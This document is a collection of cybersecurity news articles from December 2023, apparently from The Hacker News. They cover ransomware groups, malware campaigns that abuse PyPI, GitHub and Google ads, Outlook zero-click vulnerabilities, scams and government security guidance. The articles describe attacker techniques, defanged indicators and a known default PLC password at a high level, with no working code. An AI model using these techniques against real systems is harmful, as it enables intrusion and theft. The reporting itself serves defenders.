In a conversation with vx-underground, a LockBit administrator described the situation as "unfortunate" and that security loopholes in their infrastructure are a primary threat to "my business."
Behind the Scenes of Matveev's Ransomware Empire: Tactics and Team
19.12.23 Ransom The Hacker News
Cybersecurity researchers have shed light on the inner workings of the ransomware operation led by Mikhail Pavlovich Matveev, a Russian national who was indicted by the U.S. government earlier this year for his alleged role in launching thousands of attacks across the world.
Matveev, who resides in Saint Petersburg and is known by the aliases Wazawaka, m1x, Boriselcin, Uhodiransomwar, Orange, and waza, is alleged to have played a crucial part in the development and deployment of LockBit, Babuk, and Hive ransomware variants since at least June 2020.
"Wazawaka and his team members prominently exhibit an insatiable greed for ransom payments, demonstrating a significant disregard for ethical values in their cyber operations," Swiss cybersecurity firm PRODAFT said in a comprehensive analysis shared with The Hacker News.
"Employing tactics that involve intimidation through threats to leak sensitive files, engaging in dishonest practices, and persisting in retaining files even after the victim complies with the ransom payment, they exemplify the ethical void prevalent in the practices of traditional ransomware groups."
PRODAFT's findings are the result of data compiled between April and December 2023 by intercepting thousands of communication logs between various threat actors affiliated with various ransomware variants.
Matawveev is said to lead a team of six penetration testers – 777, bobr.kurwa, krbtgt, shokoladniy_zayac, WhyNot, and dushnila – to execute the attacks. The group has a flat hierarchy, fostering better collaboration between the members.
"Each individual contributes resources and expertise as needed, showcasing a remarkable level of flexibility in adapting to new scenarios and situations," PRODAFT said.
Matveev, besides working as an affiliate for Conti, LockBit, Hive, Monti, Trigona, and NoEscape, also had a management-level role with the Babuk ransomware group up until early 2022, while sharing what's being described as a "complex relationship" with another actor named Dudka, who is likely the developer behind Babuk and Monti.
Attacks mounted by Matveev and his team involve the use of Zoominfo and services like Censys, Shodan, and FOFA to gather information about the victims, relying on known security flaws and initial access brokers for obtaining a foothold, in addition to using a mix of custom and off-the-shelf tools to brute-force VPN accounts, escalate privileges, and streamline their campaigns.
"Following the attainment of initial access, Wazawaka and his team primarily employ PowerShell commands to execute their preferred Remote Monitoring and Management (RMM) tool," the company said. "Distinctively, MeshCentral stands out as the team's unique toolkit, frequently utilized as their preferred open-source software for various operations."
PRODAFT's analysis further uncovered connections between Matveev and Evgeniy Mikhailovich Bogachev, a Russian national linked to the development of the GameOver Zeus botnet, which was dismantled in 2014, and Evil Corp.
It's worth noting that the Babuk ransomware operations rebranded as PayloadBIN in 2021, with the latter tied to Evil Corp in an apparent effort to get around sanctions imposed against it by the U.S. in December 2019.
"This technical association, coupled with the known relationship between Wazawaka and the notorious cybercriminal Bogachev, suggests deeper connections among Wazawaka, Bogachev, and the operations of Evil Corp," PRODAFT said.
Hackers Abusing GitHub to Evade Detection and Control Compromised Hosts
19.12.23 Security The Hacker News
Threat actors are increasingly making use of GitHub for malicious purposes through novel methods, including abusing secret Gists and issuing malicious commands via git commit messages.
"Malware authors occasionally place their samples in services like Dropbox, Google Drive, OneDrive, and Discord to host second stage malware and sidestep detection tools," ReversingLabs researcher Karlo Zanki said in a report shared with The Hacker News.
"But lately, we have observed the increasing use of the GitHub open-source development platform for hosting malware."
Legitimate public services are known to be used by threat actors for hosting malware and acting as dead drop resolvers to fetch the actual command-and-control (C2) address.
This technique is sneaky as it allows threat actors to blend their malicious network traffic with genuine communications within a compromised network, making it challenging to detect and respond to threats in an effective manner. As a result, the chances that an infected endpoint communicating with a GitHub repository will be flagged as suspicious is less likely.
The abuse of GitHub gists points to an evolution of this trend. Gists, which are nothing but repositories, offer an easy way for developers to share code snippets with others.
It's worth noting at this stage that public gists show up in GitHub's Discover feed, while secret gists, although not accessible via Discover, can be shared with others by sharing its URL.
"However, if someone you don't know discovers the URL, they'll also be able to see your gist," GitHub notes in its documentation. "If you need to keep your code away from prying eyes, you may want to create a private repository instead."
Another interesting aspect of secret gists is that they are not displayed in the GitHub profile page of the author, enabling threat actors to leverage them as some sort of a pastebin service.
ReversingLabs said it identified several PyPI packages – namely, httprequesthub, pyhttpproxifier, libsock, libproxy, and libsocks5 – that masqueraded as libraries for handling network proxying, but contained a Base64-encoded URL pointing to a secret gist hosted in a throwaway GitHub account without any public-facing projects.
The gist, for its part, features Base64-encoded commands that are parsed and executed in a new process through malicious code present in the setup.py file of the counterfeit packages.
The use of secret gists to deliver malicious commands to compromised hosts was previously highlighted by Trend Micro in 2019 as part of a campaign distributing a backdoor called SLUB (short for SLack and githUB).
A second technique observed by the software supply chain security firm entails the exploitation of version control system features, relying on git commit messages to extract commands for execution on the system.
The PyPI package, named easyhttprequest, incorporates malicious code that "clones a specific git repository from GitHub and checks if the 'head' commit of this repository contains a commit message that starts with a specific string," Zanki said.
"If it does, it strips that magic string and decodes the rest of the Base64-encoded commit message, executing it as a Python command in a new process." The GitHub repository that gets cloned is a fork of a seemingly legitimate PySocks project, and it does not have any malicious git commit messages.
All the fraudulent packages have now been taken down from the Python Package Index (PyPI) repository.
"Using GitHub as C2 infrastructure isn't new on its own, but abuse of features like Git Gists and commit messages for command delivery are novel approaches used by malicious actors," Zanki said.
Iranian Hackers Using MuddyC2Go in Telecom Espionage Attacks Across Africa
19.12.23 BigBrothers The Hacker News
The Iranian nation-state actor known as MuddyWater has leveraged a newly discovered command-and-control (C2) framework called MuddyC2Go in its attacks on the telecommunications sector in Egypt, Sudan, and Tanzania.
The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under the name Seedworm, which is also tracked under the monikers Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Static Kitten, TEMP.Zagros, and Yellow Nix.
Active since at least 2017, MuddyWater is assessed to be affiliated with Iran's Ministry of Intelligence and Security (MOIS), primarily singling out entities in the Middle East.
The cyber espionage group's use of MuddyC2Go was first highlighted by Deep Instinct last month, describing it as a Golang-based replacement for PhonyC2, itself a successor to MuddyC3. However, there is evidence to suggest that it may have been employed as early as 2020.
While the full extent of MuddyC2Go's capabilities is not yet known, the executable comes fitted with a PowerShell script that automatically connects to Seedworm's C2 server, thereby giving the attackers remote access to a victim system and obviating the need for manual execution by an operator.
The latest set of intrusions, which took place in November 2023, have also been found to rely on SimpleHelp and Venom Proxy, alongside a custom keylogger and other publicly available tools.
Attack chains mounted by the group have a track record of weaponizing phishing emails and known vulnerabilities in unpatched applications for initial access, followed by conducting reconnaissance, lateral movement, and data collection.
In the attacks documented by Symantec targeting an unnamed telecommunications organization, the MuddyC2Go launcher was executed to establish contact with an actor-controlled server, while also deploying legitimate remote access software like AnyDesk and SimpleHelp.
The entity is said to have been previously compromised by the adversary earlier in 2023 in which SimpleHelp was used to launch PowerShell, deliver proxy software, and also install the JumpCloud remote access tool.
"In another telecommunications and media company targeted by the attackers, multiple incidents of SimpleHelp were used to connect to known Seedworm infrastructure," Symantec noted. "A custom build of the Venom Proxy hacktool was also executed on this network, as well as the new custom keylogger used by the attackers in this activity."
By utilizing a combination of bespoke, living-off-the-land, and publicly available tools in its attack chains, the goal is to evade detection for as long as possible to meet its strategic objectives, the company said.
"The group continues to innovate and develop its toolset when required in order to keep its activity under the radar," Symantec concluded. "The group still makes heavy use of PowerShell and PowerShell-related tools and scripts, underlining the need for organizations to be aware of suspicious use of PowerShell on their networks."
The development comes as an Israel-linked group called Gonjeshke Darande (meaning "Predatory Sparrow" in Persian) claimed responsibility for a cyber attack that disrupted a "majority of the gas pumps throughout Iran" in response to the "aggression of the Islamic Republic and its proxies in the region."
The group, which reemerged in October 2023 after going quiet for nearly a year, is believed to be linked to the Israeli Military Intelligence Directorate, having conducted destructive attacks in Iran, including steel facilities, petrol stations, and rail networks in the country.
New Malvertising Campaign Distributing PikaBot Disguised as Popular Software
19.12.23 BotNet The Hacker News
The malware loader known as PikaBot is being distributed as part of a malvertising campaign targeting users searching for legitimate software like AnyDesk.
"PikaBot was previously only distributed via malspam campaigns similarly to QakBot and emerged as one of the preferred payloads for a threat actor known as TA577," Malwarebytes' Jérôme Segura said.
The malware family, which first appeared in early 2023, consists of a loader and a core module that allows it to operate as a backdoor as well as a distributor for other payloads.
This enables the threat actors to gain unauthorized remote access to compromised systems and transmit commands from a command-and-control (C2) server, ranging from arbitrary shellcode, DLLs, or executable files, to other malicious tools such as Cobalt Strike.
One of the threat actors leveraging PikaBot in its attacks is TA577, a prolific cybercrime threat actor that has, in the past, delivered QakBot, IcedID, SystemBC, SmokeLoader, Ursnif, and Cobalt Strike.
Last month, it emerged that PikaBot, along with DarkGate, is being propagated via malspam campaigns mirror that of QakBot. "Pikabot infection led to Cobalt Strike on 207.246.99[.]159:443 using masterunis[.]net as its domain," Palo Alto Networks Unit 42 disclosed recently.
The latest initial infection vector is a malicious Google ad for AnyDesk that, when clicked by a victim from the search results page, redirects to a fake website named anadesky.ovmv[.]net that points to a malicious MSI installer hosted on Dropbox.
It's worth pointing out that the redirection to the bogus website only occurs after fingerprinting the request, and only if it's not originating from a virtual machine.
"The threat actors are bypassing Google's security checks with a tracking URL via a legitimate marketing platform to redirect to their custom domain behind Cloudflare," Segura explained. "At this point, only clean IP addresses are forwarded to the next step."
Interestingly, a second round of fingerprinting takes place when the victim clicks on the download button on the website, likely in an added attempt to ensure that it's not accessible in a virtualized environment.
Malwarebytes said the attacks are reminiscent of previously identified malvertising chains employed to disseminate another loader malware known as FakeBat (aka EugenLoader).
"This is particularly interesting because it points towards a common process used by different threat actors," Segura said. "Perhaps, this is something akin to 'malvertising-as-a-service' where Google ads and decoy pages are provided to malware distributors."
This disclosure comes as the cybersecurity company said it detected a spike in malicious ads through Google searches for popular software like Zoom, Advanced IP Scanner, and WinSCP to deliver a previously never-before-seen loader called HiroshimaNukes as well as FakeBat.
"It uses several techniques to bypass detection from DLL side-loading to very large payloads," Segura said. "Its goal is to drop additional malware, typically a stealer followed by data exfiltration."
The rise in malvertising is indicative of how browser-based attacks act as channels for infiltrating target networks. This also includes a new Google Chrome extension framework codenamed ParaSiteSnatcher, which allows threat actors to "monitor, manipulate, and exfiltrate highly sensitive information from multiple sources."
Specifically designed to compromise users in Latin America, the rogue extension is noteworthy for its use of the Chrome Browser API to intercept and exfiltrate all POST requests containing sensitive account and financial information. It's downloaded through a VBScript downloader hosted on Dropbox and Google Cloud and installed onto an infected system.
"Once installed, the extension manifests with the help of extensive permissions enabled through the Chrome extension, allowing it to manipulate web sessions, web requests, and track user interactions across multiple tabs using the Chrome tabs API," Trend Micro said last month.
"The malware includes various components that facilitate its operation, content scripts that enable malicious code injection into web pages, monitor Chrome tabs, and intercept user input and web browser communication."
8220 Gang Exploiting Oracle WebLogic Server Vulnerability to Spread Malware
19.12.23 Virus The Hacker News
The threat actors associated with the 8220 Gang have been observed exploiting a high-severity flaw in Oracle WebLogic Server to propagate their malware.
The security shortcoming is CVE-2020-14883 (CVSS score: 7.2), a remote code execution bug that could be exploited by authenticated attackers to take over susceptible servers.
"This vulnerability allows remote authenticated attackers to execute code using a gadget chain and is commonly chained with CVE-2020-14882 (an authentication bypass vulnerability also affecting Oracle Weblogic Server) or the use of leaked, stolen, or weak credentials," Imperva said in a report published last week.
The 8220 Gang has a history of leveraging known security flaws to distribute cryptojacking malware. Earlier this May, the group was spotted utilizing another shortcoming in Oracle WebLogic servers (CVE-2017-3506, CVSS score: 7.4) to rope the devices into a crypto mining botnet.
Recent attack chains documented by Imperva entail the exploitation of CVE-2020-14883 to specially craft XML files and ultimately run code responsible for deploying stealer and coin mining malware such as Agent Tesla, rhajk, and nasqa.
"The group appears to be opportunistic when selecting their targets, with no clear trend in country or industry," Imperva security researcher Daniel Johnston said.
Targets of the campaign include healthcare, telecommunications, and financial services sectors in the U.S., South Africa, Spain, Columbia, and Mexico.
"The group relies on simple, publicly available exploits to target well-known vulnerabilities and exploit easy targets to achieve their objectives," Johnston added. "While considered unsophisticated, they are constantly evolving their tactics and techniques to evade detection."
Rhadamanthys Malware: Swiss Army Knife of Information Stealers Emerges
19.12.23 Virus The Hacker News
The developers of the information stealer malware known as Rhadamanthys are actively iterating on its features, broadening its information-gathering capabilities and also incorporating a plugin system to make it more customizable.
This approach not only transforms it into a threat capable of delivering "specific distributor needs," but also makes it more potent, Check Point said in a technical deep dive published last week.
Rhadamanthys, first documented by ThreatMon in October 2022, has been sold under the malware-as-a-service (MaaS) model as early as September 2022 by an actor under the alias "kingcrete2022."
Typically distributed through malicious websites mirroring those of genuine software that are advertised through Google ads, the malware is capable of harvesting a wide range of sensitive information from compromised hosts, including from web browsers, crypto wallets, email clients, VPN, and instant messaging apps.
"Rhadamanthys represents a step in the emerging tradition of malware that tries to do as much as possible, and also a demonstration that in the malware business, having a strong brand is everything," the Israeli cybersecurity firm noted in March 2022.
A subsequent investigation into the off-the-shelf malware in August revealed "design and implementation" overlap with that of the Hidden Bee coin miner.
"The similarity is apparent at many levels: custom executable formats, the use of similar virtual filesystems, identical paths to some of the components, reused functions, similar use of steganography, use of LUA scripts, and overall analogous design," the researchers said, describing the malware's development as "fast-paced and ongoing."
As of writing, the current working version of Rhadamanthys is 0.5.2, per the description on the threat actor's Telegram channel.
Check Point's analysis of versions 0.5.0 and 0.5.1 reveals a new plugin system that effectively makes it more of a Swiss Army knife, indicating a shift towards modularization and customization. This also allows the stealer customers to deploy additional tools tailored to their targets.
The stealer components are both active, capable of opening processes and injecting additional payloads designed to facilitate information theft, and passive, which are designed to search and parse specific files to retrieve saved credentials.
Another noticeable aspect is the use of a Lua script runner that can load up to 100 Lua scripts to pilfer as much information as possible from cryptocurrency wallets, email agents, FTP services, note-taking apps, instant messengers, VPNs, two-factor authentication apps, and password managers.
Version 0.5.1 goes a step further, adding clipper functionality to alter clipboard data matching wallet addresses to divert cryptocurrency payments to an attacker-controlled wallet as well as an option to recover Google Account cookies, following the footsteps of Lumma Stealer.
"The author keeps enriching the set of available features, trying to make it not only a stealer but a multipurpose bot, by enabling it to load multiple extensions created by a distributor," security researcher Aleksandra "Hasherezade" Doniec said.
"The added features, such as a keylogger, and collecting information about the system, are also a step towards making it a general-purpose spyware."
AsyncRAT's Code Injection into aspnet_compiler.exe#
The findings come as Trend Micro detailed new AsyncRAT infection chains that leverage a legitimate Microsoft process called aspnet_compiler.exe, which is used for precompiling ASP.NET web applications, to stealthily deploy the remote access trojan (RAT) via phishing attacks.
Similar to how Rhadamanthys carries out code injection into running processes, the multi-stage process culminates in the AsyncRAT payload being injected into a newly spawned aspnet_compiler.exe process to ultimately establish contact with a command-and-control (C2) server.
"The AsyncRAT backdoor has other capabilities depending on the embedded configuration," security researchers Buddy Tancio, Fe Cureg, and Maria Emreen Viray said. "This includes anti-debugging and analysis checks, persistence installation, and keylogging."
It's also designed to scan particular folders within the application directory, browser extensions, and user data to check for the presence of crypto wallets. On top of that, the threat actors have been observed relying on Dynamic DNS (DDNS) to deliberately obfuscate their activities.
"The use of dynamic host servers allows threat actors to seamlessly update their IP addresses, strengthening their ability to remain undetected within the system," the researchers said.
QakBot Malware Resurfaces with New Tactics, Targeting the Hospitality Industry
19.12.23 Virus The Hacker News
A new wave of phishing messages distributing the QakBot malware has been observed, more than three months after a law enforcement effort saw its infrastructure dismantled by infiltrating its command-and-control (C2) network.
Microsoft, which made the discovery, described it as a low-volume campaign that began on December 11, 2023, and targeted the hospitality industry.
"Targets received a PDF from a user masquerading as an IRS employee," the tech giant said in a series of posts shared on X (formerly Twitter).
"The PDF contained a URL that downloads a digitally signed Windows Installer (.msi). Executing the MSI led to Qakbot being invoked using export 'hvsi' execution of an embedded DLL."
Microsoft said that the payload was generated the same day the campaign started and that it's configured with the previously unseen version 0x500.
Zscaler ThreatLabz, in a post shared on X, described the resurfaced QakBot as a 64-bit binary that utilizes AES for network encryption and sends POST requests to the path /teorema505.
QakBot, also called QBot and Pinkslipbot, was disrupted as part of a coordinated effort called Operation Duck Hunt after the authorities managed to gain access to its infrastructure and instructed the infected computers to download an uninstaller file to render the malware ineffective.
Traditionally distributed via spam email messages containing malicious attachments or hyperlinks, QakBot is capable of harvesting sensitive information as well as delivering additional malware, including ransomware.
In October 2023, Cisco Talos revealed that QakBot affiliates were leveraging phishing lures to deliver a mix of ransomware, remote access trojans, and stealer malware.
The return of QakBot mirrors that of Emotet, which also resurfaced in late 2021 months after it was dismantled by law enforcement and has remained an enduring threat, albeit at a lower level.
While it remains to be seen if the malware will return to its former glory, the resilience of such botnets underscores the need for organizations to avoid falling victim to spam emails used in Emotet and QakBot campaigns.
Double-Extortion Play Ransomware Strikes 300 Organizations Worldwide
19.12.23 Ransom The Hacker News
The threat actors behind the Play ransomware are estimated to have impacted approximately 300 entities as of October 2023, according to a new joint cybersecurity advisory from Australia and the U.S.
"Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data and have impacted a wide range of businesses and critical infrastructure organizations in North America, South America, Europe, and Australia," authorities said.
Also called Balloonfly and PlayCrypt, Play emerged in 2022, exploiting security flaws in Microsoft Exchange servers (CVE-2022-41040 and CVE-2022-41082) and Fortinet appliances (CVE-2018-13379 and CVE-2020-12812) to breach enterprises and deploy file-encrypting malware.
It's worth pointing out that ransomware attacks are increasingly exploiting vulnerabilities rather than using phishing emails as initial infection vectors, jumping from nearly zero in the second half of 2022 to almost a third in the first half of 2023, per data from Corvus.
Cybersecurity firm Adlumin, in a report published last month, revealed that Play is being offered to other threat actors "as a service," completing its transformation into a ransomware-as-a-service (RaaS) operation.
Ransomware attacks orchestrated by the group are characterized by the use of public and bespoke tools like AdFind to run Active Directory queries, GMER, IOBit, and PowerTool to disable antivirus software, and Grixba to enumerate network information and for collecting information about backup software and remote administration tools installed on a machine.
The threat actors have also been observed to carry out lateral movement and data exfiltration and encryption steps, banking on Cobalt Strike, SystemBC, and Mimikatz for post-exploitation.
"The Play ransomware group uses a double-extortion model, encrypting systems after exfiltrating data," the agencies said. "Ransom notes do not include an initial ransom demand or payment instructions, rather, victims are instructed to contact the threat actors via email."
According to statistics compiled by Malwarebytes, Play is said to have claimed nearly 40 victims in November 2023 alone, but significantly trailing behind its peers LockBit and BlackCat (aka ALPHV and Noberus).
The alert comes days after U.S. government agencies released an updated bulletin about the Karakurt group, which is known to eschew encryption-based attacks in favor of pure extortion after obtaining initial access to networks via purchasing stolen login credentials, intrusion brokers (aka initial access brokers), phishing, and known security flaws.
"Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom," the government said.
The developments also come amid speculations that the BlackCat ransomware may have been a target of a law enforcement operation after its dark web leak portals went offline for five days. However, the e-crime collective pinned the outage on a hardware failure.
What's more, another nascent ransomware group known as NoEscape is alleged to have pulled an exit scam, effectively "stealing the ransom payments and closing down the group's web panels and data leak sites," prompting other gangs like LockBit to recruit their former affiliates.
That the ransomware landscape is constantly evolving and shifting, whether be it due to external pressure from law enforcement, is hardly surprising. This is further evidenced by the collaboration between the BianLian, White Rabbit, and Mario ransomware gangs in a joint extortion campaign targeting publicly traded financial services firms.
"These cooperative ransom campaigns are rare, but are possibly becoming more common due to the involvement of initial access brokers (IABs) collaborating with multiple groups on the dark web," Resecurity said in a report published last week.
"Another factor that may be leading to greater collaboration are law enforcement interventions that create cybercriminal diaspora networks. Displaced participants of these threat actor networks may be more willing to collaborate with rivals."
Beware: Experts Reveal New Details on Zero-Click Outlook RCE Exploits
19.12.23 Exploit The Hacker News
Technical details have emerged about two now-patched security flaws in Microsoft Windows that could be chained by threat actors to achieve remote code execution on the Outlook email service sans any user interaction.
"An attacker on the internet can chain the vulnerabilities together to create a full, zero-click remote code execution (RCE) exploit against Outlook clients," Akamai security researcher Ben Barnea, who discovered the vulnerabilities, said in a two-part report shared with The Hacker News.
The security issues, which were addressed by Microsoft in August and October 2023, respectively, are listed below -
CVE-2023-35384 (CVSS score: 5.4) - Windows HTML Platforms Security Feature Bypass Vulnerability
CVE-2023-36710 (CVSS score: 7.8) - Windows Media Foundation Core Remote Code Execution Vulnerability
CVE-2023-35384 has been described by Akamai as a bypass for a critical security flaw that Microsoft patched in March 2023. Tracked as CVE-2023-23397 (CVSS score: 9.8), the flaw relates to a case of privilege escalation that could result in the theft of NTLM credentials and enable an attacker to conduct a relay attack.
Earlier this month, Microsoft, Proofpoint, and Palo Alto Networks Unit 42 revealed that a Russian threat actor known as APT28 (aka Forest Blizzard) has been actively weaponizing the bug to gain unauthorized access to victims' accounts within Exchange servers.
It's worth noting that CVE-2023-35384 is also the second patch bypass after CVE-2023-29324, which was also discovered by Barnea and subsequently remediated by Redmond as part of May 2023 security updates.
"We found another bypass to the original Outlook vulnerability — a bypass that once again allowed us to coerce the client to connect to an attacker-controlled server and download a malicious sound file," Barnea said.
CVE-2023-35384, like CVE-2023-29324, is rooted in the parsing of a path by the MapUrlToZone function that could be exploited by sending an email containing a malicious file or a URL to an Outlook client.
"A security feature bypass vulnerability exists when the MSHTML platform fails to validate the correct Security Zone of requests for specific URLs. This could allow an attacker to cause a user to access a URL in a less restricted Internet Security Zone than intended," Microsoft noted in its advisory.
In doing so, the vulnerability can not only be used to leak NTLM credentials, but can also be chained with the sound parsing flaw (CVE-2023-36710) to download a custom sound file that, when autoplayed using Outlook's reminder sound feature, can lead to a zero-click code execution on the victim machine.
CVE-2023-36710 impacts the Audio Compression Manager (ACM) component, a legacy Windows multimedia framework that's used to manage audio codecs, and is the result of an integer overflow vulnerability that occurs when playing a WAV file.
"Finally, we managed to trigger the vulnerability using the IMA ADP codec," Barnea explained. "The file size is approximately 1.8 GB. By performing the math limit operation on the calculation we can conclude that the smallest possible file size with IMA ADP codec is 1 GB."
To mitigate the risks, it's recommended that organizations use microsegmentation to block outgoing SMB connections to remote public IP addresses. Additionally, it also advised to either disable NTLM, or add users to the Protected Users security group, which prevents the use of NTLM as an authentication mechanism.
Four U.S. Nationals Charged in $80 Million Pig Butchering Crypto Scam
19.12.23 Cryptocurrency The Hacker News
Four U.S. nationals have been charged for participating in an illicit scheme that earned them more than $80 million via cryptocurrency investment scams.
The defendants – Lu Zhang, 36, of Alhambra, California; Justin Walker, 31, of Cypress, California; Joseph Wong, 32, Rosemead, California; and Hailong Zhu, 40, Naperville, Illinois – have been charged with conspiracy to commit money laundering, concealment money laundering, and international money laundering.
The U.S. Department of Justice (DoJ), which announced the arrests of both Zhang and Walker in connection with the fraudulent operation, said the quartet opened shell companies and bank accounts to carry out pig butchering scams, transferring the ill-gotten funds to domestic and international financial entities.
If convicted, Zhang and Walker face a maximum penalty of 20 years in prison. Their alleged co-conspirators remain at large.
"The overall fraud scheme in the related pig-butchering syndicate involved at least 284 transactions and resulted in more than $80 million in victim losses," the DoJ said. "More than $20 million in victim funds were directly deposited into bank accounts associated with the defendants."
The enforcement action comes as a Nigerian national named Eze Harrison Arinze was sentenced to three years in prison for his role in conducting pig butchering scams and defrauding 34 victims in 13 countries, leading to $592,000 in losses.
Late last month, the U.S. DoJ also announced the seizure of nearly $9 million worth of Tether that were traced to cryptocurrency addresses allegedly associated with a Southeast Asia based organization that exploited over 70 victims through pig butchering scams.
Pig butchering falls under the category of so-called romance-investment scams, wherein people are targeted via dating apps under fictitious identities to gain their trust and dupe them into investing their money in seemingly legitimate and profitable ventures, typically promising high investment returns within a short span of time.
"After persuading the victim to invest, the scammers collect the funds, often using digital payment platforms or cryptocurrencies to make tracking more difficult," Trend Micro said in a report detailing the scam.
"Once they have received a substantial sum from their victims, or once the victims try to withdraw funds from the account, the scammers will suddenly become unreachable, or the brokerage platform will have trouble transferring funds. Scammers could also delete their online presence or create new identities, making it difficult for victims to recover their lost funds."
One of the emerging trends in the space involves the use of group chats, indicating that the cyber criminals are adapting and refining their strategies to make them more effective.
In these cases, prospective victims are added to a fake investment chat group under their control. Should the target express interest in investing in cryptocurrencies, the conversation is moved to a one-to-one chat, where they are introduced to a bogus brokerage platform and persuaded to transfer their funds to the service.
According to the Federal Bureau of Investigation's (FBI) Internet Crime Complaint Center (IC3) report, cryptocurrency investment scams have led to unprecedented losses totaling $2.57 billion in 2022, registering a 183% increase from 2021.
"A significant portion of these phone numbers can be traced back to leaked databases containing personal information," the cybersecurity firm said. "More than half of the numbers added to the fake group chats have been found in such databases, indicating that scammers could be using leaked information to find their next victims."
CISA Urges Manufacturers Eliminate Default Passwords to Thwart Cyber Threats
19.12.23 BigBrothers The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging manufacturers to get rid of default passwords on internet-exposed systems altogether, citing severe risks that could be exploited by malicious actors to gain initial access to, and move laterally within, organizations.
In an alert published last week, the agency called out Iranian threat actors affiliated with the Islamic Revolutionary Guard Corps (IRGC) for exploiting operational technology devices with default passwords to gain access to critical infrastructure systems in the U.S.
Default passwords refer to factory default software configurations for embedded systems, devices, and appliances that are typically publicly documented and identical among all systems within a vendor's product line.
As a result, threat actors could scan for internet-exposed endpoints using tools like Shodan and attempt to breach them through default passwords, often gaining root or administrative privileges to perform post-exploitation actions depending on the type of the system.
"Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary," MITRE notes.
Earlier this month, CISA revealed that IRGC-affiliated cyber actors using the persona Cyber Av3ngers are actively targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs) that are publicly exposed to the internet through the use of default passwords ("1111").
"In these attacks, the default password was widely known and publicized on open forums where threat actors are known to mine intelligence for use in breaching U.S. systems," the agency added.
As mitigation measures, manufacturers are being urged to follow secure by design principles and provide unique setup passwords with the product, or alternatively disable such passwords after a preset time period and require users to enable phishing-resistant multi-factor authentication (MFA) methods.
The agency further advised vendors to conduct field tests to determine how their customers are deploying the products within their environments and if they involve the use of any unsafe mechanisms.
"Analysis of these field tests will help bridge the gap between developer expectations and actual customer usage of the product," CISA noted in its guidance.
"It will also help identify ways to build the product so customers will be most likely to securely use it—manufacturers should ensure that the easiest route is the secure one."
The disclosure comes as the Israel National Cyber Directorate (INCD) attributed a Lebanese threat actor with connections to the Iranian Ministry of Intelligence for orchestrating cyber attacks targeting critical infrastructure in the country amidst its ongoing war with Hamas since October 2023.
The attacks, which involve the exploitation of known security flaws (e.g., CVE-2018-13379) to obtain sensitive information and deploy destructive malware, have been tied to an attack group named Plaid Rain (formerly Polonium).
The development also follows the release of a new advisory from CISA that outlines security countermeasures for healthcare and critical infrastructure entities to fortify their networks against potential malicious activity and reduce the likelihood of domain compromise -
Enforce strong passwords and phishing-resistant MFA
Ensure that only ports, protocols, and services with validated business needs are running on each system
Configure Service accounts with only the permissions necessary for the services they operate
Change all default passwords for applications, operating systems, routers, firewalls, wireless access points, and other systems
Discontinue reuse or sharing of administrative credentials among user/administrative accounts
Mandate consistent patch management
Implement network segregation controls
Evaluate the use of unsupported hardware and software and discontinue where possible
Encrypt personally identifiable information (PII) and other sensitive data
On a related note, the U.S. National Security Agency (NSA), Office of the Director of National Intelligence (ODNI), and CISA published a list of recommended practices that organizations can adopt in order to harden the software supply chain and improve the safety of their open-source software management processes.
"Organizations that do not follow a consistent and secure-by-design management practice for the open-source software they utilize are more likely to become vulnerable to known exploits in open-source packages and encounter more difficulty when reacting to an incident," said Aeva Black, open-source software security lead at CISA.
MongoDB Suffers Security Breach, Exposing Customer Data
17.12.23 Incindent The Hacker News
MongoDB on Saturday disclosed it's actively investigating a security incident that has led to unauthorized access to "certain" corporate systems, resulting in the exposure of customer account metadata and contact information.
The American database software company said it first detected anomalous activity on December 13, 2023, and that it immediately activated its incident response efforts.
It further noted that "this unauthorized access has been going on for some period of time before discovery," but emphasized it's not "aware of any exposure to the data that customers store in MongoDB Atlas." It did not disclose the exact time period of the compromise.
In light of the breach, MongoDB recommends that all customers be on the lookout for social engineering and phishing attacks, enforce phishing-resistant multi-factor authentication (MFA), as well as rotate their MongoDB Atlas passwords.
That's not all. The company said it's also experiencing elevated login attempts that are causing issues for customers attempting to log in to Atlas and its Support Portal. It, however, said the problem is unrelated to the security event.
When reached for comment, MongoDB told The Hacker News that the incident is a matter of ongoing investigation and that it will "provide updates as soon as we can."
(This is a developing story. Please check back for more updates.)
China's MIIT Introduces Color-Coded Action Plan for Data Security Incidents
16.12.23 Incindent The Hacker News
China's Ministry of Industry and Information Technology (MIIT) on Friday unveiled draft proposals detailing its plans to tackle data security events in the country using a color-coded system.
The effort is designed to "improve the comprehensive response capacity for data security incidents, to ensure timely and effective control, mitigation and elimination of hazards and losses caused by data security incidents, to protect the lawful rights and interests of individuals and organizations, and to safeguard national security and public interests, the department said.
The 25-page document encompasses all incidents in which data has been illegally accessed, leaked, destroyed, or tampered with, categorized them into four hierarchical tiers based on the scope and the degree of harm caused -
Red: Level I ("especially significant"), which applies to widespread shutdowns, substantial loss of business processing capability, interruptions arising due to serious anomalies lasting more than 24 hours, occurrence of major radio interference for more than 24 hours, economic losses 1 billion yuan, or affects the personal information of over 100 million people or sensitive personal information of more than 10 million people
Orange: Level II ("significant"), which applies to shutdowns and operational interruptions lasting more than 12 hours, occurrence of major radio interference for more than 12 hours,, economic losses between 100 million yuan and 1 billion yuan, or affects the personal information of over 10 million people or sensitive personal information of more than 1 million people
Yellow: Level III ("large"), which applies to operational interruptions lasting more than eight hours, occurrence of major radio interference for more than eight hours, economic losses between 50 million yuan and 100 million yuan, or affects the personal information of over 1 million people or sensitive personal information of more than 100,000 people
Blue: Level IV ("general"), which applies to minor events that cause operational interruptions lasting less than eight hours, economic losses of less than 50 million yuan, or affects the personal information of less than 1 million people or sensitive personal information of less than 100,000 people
The new rules also require affected companies to make an assessment to determine the severity of the incident, and if deemed serious, report it immediately to the local industry supervision department without omitting or concealing any facts, or providing any false information.
"If the local industry regulatory department initially determines that it is a particularly major or major data security incident, it should report it to the Mechanism Office in accordance with the requirements of '10 minutes by phone and 30 minutes in writing' after discovering the incident," the draft rules state.
Based on the response level activated – Red or Orange – the Mechanism Office is expected to report the matter to the MIIT. The draft rules are open for public comments until January 15, 2024.
